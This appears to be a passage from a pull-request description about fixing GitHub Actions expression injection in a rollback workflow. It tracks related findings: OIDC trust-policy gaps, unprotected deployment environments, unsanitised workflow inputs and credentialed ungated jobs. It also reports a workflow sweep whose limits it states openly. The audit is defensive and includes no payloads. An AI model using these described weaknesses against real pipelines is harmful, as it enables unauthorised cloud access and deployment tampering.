Nothing in this repo parses workflow files for this class. There is no `actionlint` or `zizmor` in CI or in `.pre-commit-config.yaml`. The Security Scanning job runs `govulncheck` and `gosec`, both Go-source scanners that never open `.github/workflows/`. `trivy-config` targets Terraform/Dockerfile/K8s misconfiguration, not Actions expression injection, and the `check-yaml` hook only proves the YAML parses. Adding `actionlint` to pre-commit would have caught this at write time — filed as **#1646**.

## Deliberately out of scope — all tracked as issues

Every item below is filed, so none of it is lost when this PR merges.

| # | Finding | Labels |
|---|---|---|
| **#1660** | Deployment environments have no protection rules and the rollback ones do not exist, so the binding this PR narrows onto approves nothing. Includes the GCP WIF `attribute_condition` gap: it constrains `assertion.repository` and `assertion.ref` but never `sub`, so unlike AWS/Azure a GCP token mints for *any* environment name, including an auto-created bare one. | p1 / high |
| **#1649** | `deploy-aws-lambda.yml` had the identical shape via `github.event.release.tag_name` in an ungated `prepare` job. **Fixed in PR #1657.** | p0 / critical |
| **#1647** | `database-migration.yml` interpolates `inputs.steps` raw behind a guard that validates nothing. Latent, not demonstrated — the injection sits in an environment-bound job and reachability depends on `type: number` enforcement I could not confirm. | p1 / high |
| **#1648** | `<cloud>-<env>-rollback` environments absent from the trust-policy `sub` allowlists, so AWS **and Azure** rollback cannot authenticate at all. **Pre-existing, not introduced here** — the original carried the same bindings. Azure is worse than AWS: `sp.tf:37,48` allowlists only `ref:refs/heads/main` and `pull_request`, no `environment:*` subject at all. | p1 / high |
| **#1659** | The sibling deploy/sanity workflows grant `id-token: write` to ungated jobs; `deploy-gcp` and `deploy-azure` `build-and-deploy` actually authenticate while ungated. No injectable value, so hardening not exploit. | p1 / high |
| **#1662** | This workflow verifies the image against the assumed role's registry (`describe-images` with no `--registry-id`) while building the URI from `vars.AWS_ACCOUNT_ID`. If those diverge, "image exists" is asserted against the wrong registry. One-line fix. | p2 / medium |
| **#1646** | No `actionlint` / `zizmor` in CI or pre-commit — the systemic reason this whole class was invisible. 8 workflow files currently fail `actionlint`. | p1 / high |

Two points noted on existing issues rather than duplicated:

- **The AWS trust policy still allows `repo:<org/repo>:ref:refs/heads/main`.** No job in *this* workflow is ungated-and-credentialed any more, so the bypass is closed here. Removing that subject repo-wide would break `deploy-gcp`, `cleanup-staging` and `destroy-fargate-dev` — commented on **#1591**.
- **#1330** asked for the `verify-image` var-interpolation cleanup; this PR deletes that job outright, commented there.

## Accepted tradeoff

Image existence is now verified **inside** each gated rollback job instead of in a standalone job, so a rollback to a nonexistent tag fails *after* the environment approval rather than before it. That is deliberate: the standalone job authenticated to a cloud provider with no environment binding, which was the ungated-but-credentialed shape the exploit depended on. Documented in the workflow at `:165-169` and now in `.github/workflows/README.md`, which still listed the deleted "Verify Image" as one of four jobs.

## Sweep coverage

All 16 files in `.github/workflows/` were swept, not just the one being fixed:

- every file grepped for `inputs.*`, `github.event.*`, `github.head_ref`, `github.ref_name`, `github.actor`, and the dangerous triggers `pull_request_target` / `issue_comment` / `workflow_run`;
- every file run through `actionlint` with `shellcheck` present;
- every file with a hit read at the interpolation site.

Results: **no `pull_request_target`, `issue_comment` or `workflow_run` trigger exists anywhere in this repo**, so the untrusted-fork vector is absent. `github.actor` reaches `run:` blocks in the four deploy workflows, but GitHub usernames are `[A-Za-z0-9-]` and are not injectable. The three genuine findings are #1542 (this PR), #1649 and #1647.

What was *not* done: I did not read every `run:` block of every workflow line by line — files with no grep hit and a clean `actionlint` were not manually reviewed.

Files outside `.github/workflows/rollback.yml` are untouched, so this does not overlap #1543 / #1544 / #1545.

